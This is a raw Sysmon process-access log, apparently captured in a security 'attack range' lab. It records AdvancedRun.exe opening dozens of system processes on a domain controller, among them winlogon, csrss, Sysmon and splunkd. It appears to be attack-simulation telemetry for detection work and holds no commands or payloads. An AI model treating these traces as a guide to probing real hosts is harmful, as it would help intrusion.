un.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078634Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.918{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078633Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.918{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078632Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.918{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004078631Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.918{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078630Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.918{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078629Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.918{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000004078628Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.916{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078627Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.916{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078626Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.916{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078625Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.916{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078624Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.916{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078623Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.916{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004078622Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
Sysmon Event ID 10 (ProcessAccess) records, EventRecordID 4078621 down to 4078595, preceded by the EventData of the record whose System header ends on the line above.

System fields shared by records 4078621 to 4078595:
  EventID 10, Version 3, Level 4, Task 10, Opcode 0, Keywords 0x8000000000000000
  Channel:  Microsoft-Windows-Sysmon/Operational
  Computer: win-dc-mhaag-attack-range-139.attackrange.local

EventData fields shared by every row below:
  RuleName:          -
  UtcTime date:      2022-01-21
  SourceProcessGUID: {834264DD-14C8-61EB-9608-000000002702}
  SourceProcessId:   4784
  SourceThreadId:    6032
  SourceImage:       C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe
  GrantedAccess:     0x1410
  SourceUser:        ATTACKRANGE\Administrator
  CallTrace:         C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)

Per-record fields:

EventRecordID | UtcTime      | TargetProcessGUID                      | TargetProcessId | TargetImage                                                 | TargetUser
(header above)| 20:17:12.916 | {834264DD-DAF5-61EA-3E00-000000002702} | 3416            | C:\Windows\System32\vds.exe                                 | NT AUTHORITY\SYSTEM
4078621       | 20:17:12.916 | {834264DD-DAF5-61EA-3C00-000000002702} | 2860            | C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe   | NT AUTHORITY\SYSTEM
4078620       | 20:17:12.915 | {834264DD-DAF5-61EA-3B00-000000002702} | 2688            | C:\Windows\system32\dfssvc.exe                              | NT AUTHORITY\SYSTEM
4078619       | 20:17:12.914 | {834264DD-DAF5-61EA-3A00-000000002702} | 2668            | C:\Windows\System32\smbhash.exe                             | NT AUTHORITY\SYSTEM
4078618       | 20:17:12.913 | {834264DD-DAF5-61EA-3900-000000002702} | 2664            | C:\Windows\System32\ismserv.exe                             | NT AUTHORITY\SYSTEM
4078617       | 20:17:12.913 | {834264DD-DAF5-61EA-3800-000000002702} | 2272            | C:\Windows\system32\DFSRs.exe                               | NT AUTHORITY\SYSTEM
4078616       | 20:17:12.913 | {834264DD-DAF5-61EA-3700-000000002702} | 1932            | C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe   | NT AUTHORITY\SYSTEM
4078615       | 20:17:12.912 | {834264DD-DAF5-61EA-3500-000000002702} | 1832            | C:\Windows\system32\dns.exe                                 | NT AUTHORITY\SYSTEM
4078614       | 20:17:12.911 | {834264DD-DAF5-61EA-3400-000000002702} | 2460            | C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe            | NT AUTHORITY\SYSTEM
4078613       | 20:17:12.911 | {834264DD-DAF5-61EA-3300-000000002702} | 2488            | C:\Windows\Sysmon64.exe                                     | NT AUTHORITY\SYSTEM
4078612       | 20:17:12.907 | {834264DD-DAF5-61EA-3200-000000002702} | 1948            | C:\Windows\system32\svchost.exe                             | NT AUTHORITY\SYSTEM
4078611       | 20:17:12.904 | {834264DD-DAF5-61EA-3100-000000002702} | 660             | C:\Windows\System32\svchost.exe                             | NT AUTHORITY\NETWORK SERVICE
4078610       | 20:17:12.903 | {834264DD-DAF5-61EA-3000-000000002702} | 668             | C:\Windows\system32\svchost.exe                             | NT AUTHORITY\SYSTEM
4078609       | 20:17:12.903 | {834264DD-DAF5-61EA-2F00-000000002702} | 2440            | C:\Windows\system32\svchost.exe                             | NT AUTHORITY\SYSTEM
4078608       | 20:17:12.903 | {834264DD-DAF4-61EA-2D00-000000002702} | 2988            | C:\Windows\System32\spoolsv.exe                             | NT AUTHORITY\SYSTEM
4078607       | 20:17:12.903 | {834264DD-DAF2-61EA-2C00-000000002702} | 2896            | C:\Windows\system32\conhost.exe                             | NT AUTHORITY\SYSTEM
4078606       | 20:17:12.903 | {834264DD-DAF2-61EA-2B00-000000002702} | 2888            | C:\Users\Public\splunkd.exe                                 | NT AUTHORITY\SYSTEM
4078605       | 20:17:12.902 | {834264DD-DAF0-61EA-2900-000000002702} | 2760            | C:\Windows\System32\svchost.exe                             | NT AUTHORITY\SYSTEM
4078604       | 20:17:12.901 | {834264DD-DAE8-61EA-2000-000000002702} | 1516            | C:\Windows\system32\svchost.exe                             | NT AUTHORITY\NETWORK SERVICE
4078603       | 20:17:12.899 | {834264DD-DAE7-61EA-1800-000000002702} | 1384            | C:\Windows\system32\svchost.exe                             | NT AUTHORITY\LOCAL SERVICE
4078602       | 20:17:12.895 | {834264DD-DAE7-61EA-1700-000000002702} | 1300            | C:\Windows\System32\svchost.exe                             | NT AUTHORITY\SYSTEM
4078601       | 20:17:12.895 | {834264DD-DAE7-61EA-1600-000000002702} | 1264            | C:\Windows\system32\svchost.exe                             | NT AUTHORITY\LOCAL SERVICE
4078600       | 20:17:12.895 | {834264DD-DAE7-61EA-1500-000000002702} | 1064            | C:\Windows\system32\svchost.exe                             | NT AUTHORITY\NETWORK SERVICE
4078599       | 20:17:12.894 | {834264DD-DAE7-61EA-1400-000000002702} | 352             | C:\Windows\System32\svchost.exe                             | NT AUTHORITY\LOCAL SERVICE
4078598       | 20:17:12.894 | {834264DD-DAE7-61EA-1300-000000002702} | 832             | C:\Windows\system32\svchost.exe                             | NT AUTHORITY\LOCAL SERVICE
4078597       | 20:17:12.894 | {834264DD-DAE7-61EA-1200-000000002702} | 820             | C:\Windows\system32\dwm.exe                                 | Window Manager\DWM-1
4078596       | 20:17:12.894 | {834264DD-DAE7-61EA-1100-000000002702} | 488             | C:\Windows\System32\svchost.exe                             | NT AUTHORITY\SYSTEM
4078595       | 20:17:12.894 | {834264DD-DAE7-61EA-1000-000000002702} | 92              | C:\Windows\System32\svchost.exe                             | NT AUTHORITY\NETWORK SERVICE

10341000x80000000000000004078594Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
20:17:12.894{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\A